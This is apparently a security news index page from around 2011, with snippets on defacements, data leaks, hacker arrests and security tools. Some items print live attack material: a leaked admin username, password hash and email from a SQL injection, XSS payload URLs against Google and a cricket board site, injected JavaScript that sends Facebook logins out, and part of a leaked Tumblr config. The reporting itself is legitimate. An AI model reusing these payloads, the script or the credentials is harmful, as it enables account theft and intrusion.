The Hacker News | #1 Trusted Source for Cybersecurity News — Index Page

DB Audit v4.2.29 all-in-one database security and auditing solution ! . DB Audit Expert is a professional all-in-one database security and auditing solution for Oracle, Sybase, DB2, MySQL and Microsoft SQL Server. DB Audit Expert enables database and system administrators, security administrators, auditors and operators to track and analyze any database activity including database security, access and usage, data creation, change or deletion. What makes DB Audit really unique is its built-in support for multiple auditing methods giving you the flexibility to choose the best fit for your database security requirements. Key Benefits Improves system security and ensures system accountability. Captures both regular and “back-door” access to audited database systems. Features centralized security and auditing control of multiple database systems from a single location providing ease of management. Features unified auditing graphical interface that shortens the learning curve and is ...

Today guy from InSecurity.Ro  named  sway1990  found again a critical vulnerability (MySQL Injection) in their website. Some extracted informations : Version – ( 5.1.41-3ubuntu12.10 ) Main DB – ( c1eset ) HostName – ( web.axelsoft.ro ) User – ( c1eset@localhost ) DataBases : information_schema c1eset Tables of main db : concurs country eventsro joom_banner joom_bannerclient joom_bannertrack joom_categories joom_components joom_contact_details joom_content … joom_core_log_searches joom_groups, joom_jce_extensions joom_jce_groups … joom_users joom_weblinks jos__sessions jos_banner … A dministrator Account: username =admin password =51f9a6e361a03aee324bcc73fe8ab4a5:xt69awFsqAyvglBMcbtvq9HopIAnQ1jF email =emil@nod32.ro usertype =Super Administrator News Source : Kai Farmer

Wufeng County Procuratorat ( China Government ) website Hacked ! Hacked site :  http://www.wufeng.jcy.gov.cn/ News Source : Kai Farmer

Cross Site Scripting (XSS) vulnerability in Google Search Engine ! Vulnerabile Link :  http://www.google.com/custom?hl=en&cof=L%3Ahttps%3A%2F%2Flh5.googleusercontent.com%2F_bCYQxIvMQ2U%2FTRMT2a-UiQI%2FAAAAAAAAAYU%2FWXKFKDTesOs%2Fs640%2Fhackernews.jpg%3BBGC%3A%231f1f1f%3B&q=http%3A%2F%2Fwww.thehackernews.com%2F&btnG=Search

In the videos below, Joel Langill deconstructs each part of the worm to show it in action. In the second video you’ll see the best practices that InfoSec Institute uses (we have a training course dedicated to SCADA control systems which includes a robust Stuxnet lab) to mitigate this type of infection and security breach. Part 1: Introduction, Installation, and Injection Part 2: Mitigation & Prevention The Stuxnet worm has generated a lot of media attention and coverage for some of it’s features as well as targets. The complexity not normal for malware that we’ve witnessed, and consists of attacks against three different systems: Windows Infection Step7 Infection PLC Infection If you’d like to know more about Stuxnet & SCADA security, attend our SCADA Security Boot Camp. Leave a comment below if you have a specific instruction or ideas of what you’d like to learn in any follow-up or explanations of this video. News Source : Infosecinstitute.com

Bsnl India Helpdesk Admin panel Hacked ! Here in above pic a Indian Hackers Group " The Blackroot " Access to the Admin panel of Bsnl India Help-desk. Lol , Nothing is Secure, technical support by Bsnl also have Technical Problems ;-) News Source : Facebook 

Indonesian Soccer Association (PSSI) website hijacked by hackers ! Hackers apparently hijacked the website of the Indonesian Soccer Association (PSSI), placing an anti-corruption message on the PSSI’s homepage. The homepage currently displays a mouse holding two smoking pistol and carries the message “ Stop Corruption and Bribery in Indonesia. ” The hackers claimed to be members of a group named“ Fried Worker Activists Caring for Indonesia ”.

Zynga hacker, Ashley Mitchell jailed for two years ! British bloke Ashley Mitchell, 29, has been jailed for two years after stealing some 400 billion virtual gaming chips gaming company Zynga. Mitchell hacked his way into Zynga's back-end systems by pinching the identities of two Zynga employees and filleted the swag, some of which he managed to flog on Facebook and some he used to gamble his nights away playing online poker. Mitchell, of Paignton, Devon pleaded guilty to hacking the servers and pinching the chips, which were estimated to be worth around £7.4 million in real money. He flogged around a third of his ill-gotten gains for £53,612. James Taghdissian, prosecuting, told the court that Zynga realised in August 2009 that its chips were disappearing and suspicion fell on two employees. It turned out that Mitchell was using their details to gain access to the stash. Mitchell had been using his neighbours' Wi-Fi connections to carry out his hacks, which lead to t...

1337hax & Windowsforums hacked by Team - Indishell ! Hacked sites : http://1337hax.org/ http://www.zone-h.net/mirror/id/13288096 http://windowsforums.org/ http://www.zone-h.net/mirror/id/13288104

Tumblr security flaw , Clarification by Tumblr official staff ! On our yesterday post about  Tumblr security flaw : server IPS, API keys, passwords, etc were leaked , Finally Tumblr official staff gives a statement to all their users as below : A human error caused some sensitive server configuration information to be exposed this morning. Our technicians took immediate measures to protect from any issues that may come as a result. We’re triple checking everything and bringing in outside auditors to confirm, but we have no reason to believe that anything was compromised.  We’re certain that none of your personal information (passwords, etc.) was exposed, and your blog is backed up and safe as always.  This was an embarrassing error, but something we were prepared for. The fact that this occurred at all is still unacceptable, and we’ll be seriously evaluating and adjusting our processes to ensure an error like this can never happen again. ...

The PHP Group has confirmed the compromise of their server ! In our last post we post that, Php.net got Compromised , Read here  . Today finaly PHP group has announce that they was really got hacked,as shown in above image. Link :  http://www.php.net/archive/2011.php#id2011-03-19-2

3 websites hacked By Rao Assasin Hacker ! Hacked sites :  http://www.zooguiden.com/index.html http://www.ridleder.com/index.html http://www.bcwater.gov.cn/index.html News Source : Rao Assasin Hacker

Paki UrduHack Security Team Is No More ! The UrduHack Team Said This: I HAVE FINALLY DECIDED TO SHUTDOWN THIS SITE AND PAKI URDUHACK SECURITY TEAM FOREVER. FROM THIS MOMENT FORWARD,URDUHACK TEAM IS NO MORE,IT'S BEEN A WONDERFULL JOURNEY. DUE TO PERSONAL LIFE MATTER'S I DECIDED TO SHUTDOWN URDUHACK SECURITY TEAM.IF ANYONE USE OUR NAME OR ANYTHING ,I AM NOT RESPONSIBLE FOR HIS ACTIONS.I STARTED THIS TEAM 4 YEARS AGO ALONE BY MYSELF,DURING MY JOURNEY I MET WITH GREAT GOOD PEOPLES AND SOME BAD ONES ALSO.I DEDICATED ALL MY WORK TO MY LATE BROTHER CODE-5 ,WHO IS NO LONGER WITH ME,HE WILL BE ALWAYS REMEMBERED IN MY HEART.I WOULD LIKE TO THANK MY DEAREST FRIEND SHOZY,WHO SUPPORTED ME IN SO MANY WAYS,I CANNOT DEFINE IN WORDS.THE CONTROL OF THIS DOMAIN WILL BE IN ARSLAN HAND, HE OWN THIS DOMAIN NAME AND EVERYTHING RELATED HOST AND EVERYTHING,IF I EVER HURT ANYONE FOR THAT I AM REALLY SORRY,PLEASE FORGIVE ME. A MESSAGE FOR NEW YOUNGSTERS FROM PAKISTAN. PLEASE PLEASE PLEASE DON'T W...

40 websites defaced by A42 & skywalk3r (Team Greyhat) Hacked sites list :  http://pastebin.com/HUNLSXcQ News Source : A42 & skywalk3r (Team Greyhat)

You perhaps have followed the recent actualities about Tunisian Government stealing accounts on facebook. Read More Here ... There’s how they do: Here’s the web page of Facebook as seen when you’re connected in Tunisia http://pastebin.com/WV0C9t0F Let’s take a look at that javascript curious part.. !-- function h6h(st){var st2="";for(i=0;i<st.length;i++){c=st.charCodeAt(i);ch=(c&0xF0)>>4;cl=c&0x0F; st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;} function r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); return st;} function hAAAQ3d() { var frm = document.getElementById("login_form"); var us3r = frm.email.value; var pa55 = frm.pass.value; var url = "http://www.facebook.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55); var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else...

Update : Tumblr security flaw, Clarification by Tumblr official staff ! : The Hacker News ~ http://www.thehackernews.com/2011/03/tumblr-security-flaw-clarification-by.html There is a possible security issue with Tumblr. Basically a lot of confidential information, including server IPS, API keys, passwords, etc were leaked. There are some of the stuff that got disclosed: Database::set_defaults(array(  ‘user’ => ‘tumblr3′, ‘password’ => ‘m3MpH1C0Koh39….55Z8YWStbgTmcgQWJvFt4′,  .. define(‘MEMCACHE_HOST’, ’10.252.0.68′); define(‘MEMCACHE_VERSION_HOST’, ‘ 10.252.0.67 ‘); Database::add(‘primary’, array(‘host’ =>  ’192.168.200.142 ‘)); .. We redacted a bit to protect the innocent, but anyone can find it on Google. So what is going on? Did they got hacked somehow? We don’t think so… By looking at the disclosed data dump, it looks like one of their developers make a little mistake: i?php require_once(‘chorus/Utils.php’); Can you see it above? Instead of starting ...

The latest Web app attacks and countermeasures from world-renowned practitioners. Protect your Web applications from malicious attacks by mastering the weapons and thought processes of today’s hacker. Written by recognized security practitioners and thought leaders, Hacking Exposed Web Applications, Third Edition is fully updated to cover new infiltration methods and countermeasures. Find out how to reinforce authentication and authorization, plug holes in Firefox and IE, reinforce against injection attacks, and secure Web 2.0 features. Integrating security into the Web development lifecycle (SDL) and into the broader enterprise information security program is also covered in this comprehensive resource. Get full details on the hacker’s footprinting, scanning, and profiling tools, including SHODAN, Maltego, and OWASP DirBuster See new exploits of popular platforms like Sun Java System Web Server and Oracle WebLogic in operation Understand how attackers defeat commonly used Web authe...

Facebook  bypass of the cache servers , Check who visits your profile ! Summary Let me explain a security flaw in Facebook in relation to their cache servers, which form a layer between the Internet and internal multimedia content (photos and videos uploaded). This ruling, allows access to raw browser requests of our friends, allowing private information of these people ( web-bug ), or use as a bridge to take advantage of other external vulnerability ( CSRF ). Facebook and intermediate layer Many times you have seen this "use this application and find out who visits your profile, right?, Well, this will always be a  fake,  because Facebook is designed in a way that makes it impossible. If you look, when you go up a photo like the profile, it is resized, compressed, and stored on Facebook's own server. Actually, there are hundreds of servers, which form what is called a CDN . An example of profile photo: http://profile...

3 Brazilian Government sites hacked by " kinG oF coNTroL " KSA Hacker Hacked sites : http://campinagrande.pb.gov.br/ http://guarai.to.gov.br/ http://camaradeitapuranga.go.gov.br/ News Source : Kai Farmer

Hackers took down the website of a Tennessee nonprofit that was collecting donations for Japan and replaced the home page with profanity. Japan-America Society of Tennessee executive director Leigh Weiland said hackers broke into the site sometime Wednesday night. The group's web-hosting company was able to get the site back up Thursday morning. Before that, anyone trying to go to the group's home page encountered a mostly blank screen with an offensive phrase at the top. Weiland said her group, which promotes goodwill for and understanding of Japan, has established a relief fund for Japanese victims of Friday's earthquake and tsunami. The site has been getting a lot of traffic from people who want to donate money.

Jessica Alba, Scarlett Johansson, Christina Aguilera Reportedly Hit; Some Had Nude Photos FBI agents are reportedly closing in on a ring of hackers thought to be responsible for stealing nude photos and videos from at least 50 female celebrities. According to TMZ.com, the ring broke into the accounts of stars' cell phones and other computerized devices to obtain the compromising photos and videos. Among the celebrities reportedly hacked: Jessica Alba, Selena Gomez, Demi Lovato, Christina Aguilera, Vanessa Hudgens, Scarlett Johansson, Ali Larter, and Miley Cyrus. TMZ reported that Hudgens met with FBI agents on Thursday to discuss the hacking of her Gmail account. The FBI declined ABCNews.com's requests for comment; representatives for Hudgens did not immediately respond. One report suggested that Alexa Nikolas, an actress on the now-canceled Nickelodeon TV series "Zoey 101," is responsible for leaking one of the personal photos, a shot of her kissing Hudgens. ...

Breaking in to an encrypted router and using the WiFi connection is not an criminal offence, a Dutch court ruled. WiFi hackers can not be prosecuted for breaching router security. A court in The Hague ruled earlier this month that it is legal to break WiFi security to use the internet connection. The court also decided that piggybacking on open WiFi networks in bars and hotels can not be prosecuted. In many countries both actions are illegal and often can be fined. The ruling is linked to a case of a student who threatened to shoot down everyone at the Maerlant College in The Hague, a high school. He posted a threat on the internet message board 4chan.org using a WiFi connection that he broke into. The student was convicted for posting the message and sentenced to 20 hours of community service, but he was acquitted of the WiFi hacking charges. The Judge reasoned that the student didn't gain access to the computer connected to the router, but only used the routers internet con...

Uhispam.edu.ni hacked by Hackers Security Team – 2011 Hacked site :  http://www.uhispam.edu.ni/

England cricket board XSS vunrebility found by Rishabh Das !   Link :  http://www.ecb.co.uk/search.html?q=%3Cimg+src%3D%22http://img199.imageshack.us/img199/1189/sigjzf.jpg%22%3E

I’m assuming everyone reading already knows about Ophcrack – the awesome time/memory trade-off password cracker. Well here is a nifty web-based interface for it. Rainbow Tables are really useful when cracking password hashes, but one major disadvantage of these tables is their size which can be hundreds of gigs for complex tables. The author thought it would be extremely useful to have a personal web interface for your rainbow tables which you can access from anywhere on the web anywhere without having to carry the large tables with you everywhere you go. And well here we are, Wophcrack (Web) Ophcrack. When cracking LM or NTLM hashes Ophcrack is a great tool as we discussed recently, it provides both a GUI and CLI options along with some free and paid tables. The author basically wrote a quick and dirty PHP based web frontend for Ophcrack. Wophcrack was designed to work on Backtrack 4 R2, Although it can be install on any Linux distribution with some small adj...